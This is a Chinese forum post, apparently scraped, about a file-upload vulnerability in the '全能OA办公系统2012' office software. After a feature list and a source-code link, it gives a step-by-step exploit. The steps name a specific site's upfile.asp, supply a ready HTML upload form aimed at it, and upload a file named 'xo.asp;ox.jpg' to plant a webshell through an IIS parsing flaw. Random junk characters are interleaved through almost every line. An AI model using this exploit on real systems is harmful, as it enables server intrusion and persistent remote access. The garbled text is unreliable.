全能OA办公系统 上传漏洞3 R7 {9 b# e) r
$ H, i a7 U& D2 z系统介绍:0 {! t9 `3 i2 F% I3 E- S# h
1 r0 h! D% Q/ f2 E4 g! ] H
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
5 @+ t& U3 C( X. {1 w1 S- S
5 n1 ?$ U1 v0 H; A. v( P- y% P主要功能:. B, P+ K% C- X
公司通告 - }7 {; y$ {- ]1 T. t
工作计划
! E4 k# U" |8 i通讯助理 * s J) g6 x @$ p" w
客户资源 5 w3 u$ n4 y2 }4 f) Z% R: Y; S- d
我的公文 " H3 d J. m$ \6 ^. v g5 t
公文传阅
& j* K7 v+ p1 N) {+ U1 u' k公共资源
! m. i# n$ H4 w9 Z资源预约
; U4 V9 U+ [+ h, H/ b今日考勤
+ p2 x$ C$ E. S0 r: R个人计划 ( d: P- f! Z. V# K/ F3 q, h3 |
个人通讯录
! k7 ]& |3 k J- {. L8 r个人基本档案
7 B* ~' N" g: m/ r3 Y2 L% b" K5 K% ^未读邮件 ! u+ G$ \5 {; z- B8 y
发邮件
$ ~9 a2 ~+ k6 s2 W0 l% |% f收件夹 $ P# M! A5 r; t( D, K% V; ?: q- a" I
寄件夹
" c' N' A( d- ~3 z$ V网络硬盘 . P- b2 D: m; i5 k
网络会议
2 H+ K2 k: U+ ~$ @" P网络调查
$ b& q9 m" q$ I( b/ P; D- I0 B交流论坛: W& ?% a8 i4 m3 W0 ~$ v: v( t, `5 A4 I
3 r( u' K' U" p( W/ y. f有兴趣测试的朋友可以下源码看看
) c3 D1 z. K# o1 p% V0 X
- u* k8 [- I6 k/ L: k5 q源码下载:
! _: s. G1 x; g) v: n3 [& g) g
# c, x. r; V& F5 W: C8 q) ?http://www.mycodes.net/30/4750.htm
% U$ [! I! a/ S1 M1 k4 ` r! r/ o+ y# }- [$ t
漏洞介绍:; y3 ]9 ~/ e5 P4 l& S8 i8 }% [; F
4 v; k) @: [7 I2 }+ t
由upfile.asp上传文件漏洞引起; ~- g- T7 h, F$ i3 @1 h3 E- D/ z( p6 q& [
- I0 p5 m* Y E3 g0 P' X! n( e测试方法:
8 q7 ~7 ^" G$ Q @- n+ D7 a! \# I9 c' I: V3 V
使用名小子上传http://www.itlynn.com/upfile.asp即可
/ n" P* p: K& J9 X0 t5 O
. I+ K# L9 D6 F$ _( q4 L; ~如果upfile.asp文件被删除不存在。8 s* v6 ?, D( c- B( L; s
) i( ] }9 T+ G; ^, U 那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。2 y' e) Q% U2 t9 {# f9 w( B6 v
! w( s6 @$ S* m$ r3 L如果存在那么将如下代码保存为upfile.html。4 G2 q) v; T( q
' N5 p3 u; }0 q+ [6 g8 ], |8 [* O
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。
1 k5 Y: F0 W, k0 h/ ?9 f1 L6 c: `0 P. h3 w+ ]
: Z0 D- V+ R6 D- D% w
# [- V# `7 u( u' {* z6 S01 <table border='0' align="center" cellpadding="5"> - R. a9 n7 x, v
1 c+ j0 \) K$ `( A
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
. d- O! `+ v# p+ {7 u2 @ M, {1 U A1 N0 {5 L5 Y+ n
03 <tr>
1 t d2 v! f! C3 Q( M7 n3 h; ^. W0 C- v
04 <td>报错:</td>
+ C- w- _% p+ M" |$ M( O3 Z2 L; [7 U! [" j' L$ ? G
05 <td><input type='radio' name='errnumber' value='0'>
. ^" F' m- M9 h. Z
3 n$ U- n- {) z. q- ]8 z06 自动更名 - H; f4 y7 v D' F& m
2 s- X% M0 }) t, W5 _3 g
07 <input type='radio' name='errnumber' value='1' checked> % x$ {5 u2 [% A4 o+ }2 v5 C T) ]/ ?) e6 G
% b& [% |" ?/ K5 k( D* f08 报错方式
$ G9 n7 g( H. p0 _9 N R$ c
5 F+ K1 R/ }. h* i7 D! c09 <input type='radio' name='errnumber' value='2'>
9 u# u0 q+ {$ V0 s, u2 Z
2 m, m! e4 Q1 T. ~ d% y10 直接覆盖</td> & j F7 Y3 E6 G4 J& e# u# o
$ i. J7 ~& N; f! p11 </tr>
. {8 p- l. K( h( w7 T
9 t3 B* N4 L$ _# }12 <tr>
3 e4 a9 o. x1 [( Y: y
8 P# d2 |( B7 S L l13 <td>主题:</td>
# f! L" i& Z( D k
0 n: V- q7 U( _( @ Z6 r. u14 <td><input type='text' name='filename' size='30'></td> - a8 \7 `# s/ T0 \' R! T
) y' d- \& B. O, N
15 </tr> 1 v7 `7 z3 B% I* l
/ s6 ?" E. o: U# k16 <tr> ) m9 a* Q" Y7 v$ g2 ]& E
7 ~. ?0 b1 d& K* P+ S# y6 f4 }17 <td>文件:</td>
4 | y8 n6 H* X4 n& W# u8 T
- l& |8 p% a5 l, Z3 K- m) \18 <td><input type="file"name="fruit"size="30"></td>
" C6 x6 q% s- b% M( U4 T& c
& P/ H5 E w, e q4 h" k& m+ K19 </tr>
! p; H5 j* a+ t8 H$ v; n
) ]* K% }' o( ]! U" y20 <tr>
; A) G1 U' z8 z( z& {
" ~' x; b+ _/ O21 <td valign='top'>简介:</td>
% Q8 R0 n& Z( G
' \) C3 B( X4 U22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> , b- w+ q" |: j( m* I
3 z& K; F/ Q4 D* V7 c3 M) d23 </tr>
$ E6 v, @" R1 K+ D. X- m+ ?6 m9 k. ~0 s/ C/ F L9 X3 p
24
' G" `& U- d, E2 J, U: w( ?: Q
e5 o# t/ A5 ]+ i7 n25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
9 D+ C( S1 \7 g7 X/ F- O$ o
! L D+ O" F# d# p J" g& O26 </tr>
' n# H, v U! A8 ~2 x& ~
' i: J$ d9 U- o: E1 d. d27 </form>
- E$ X8 S3 e b# A+ q2 E
" _0 r8 V4 T4 H0 L% Y然后打开上传一个文件名为xo.asp;ox.jpg的文件。4 \6 H3 t" ^+ q* p
" U7 q/ {" Y1 h* E" B
/ q' Z+ P- x5 o# I6 ~
/ ]# b' v6 Q4 z! s2 o上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
; {" ?& A8 b4 A' m4 A3 {6 ]7 s$ p: `$ u" {
此漏洞需要配合解析漏洞利用。5 ?# k* x; n) l( c3 U
! b: D) B7 \$ ]! o7 Y |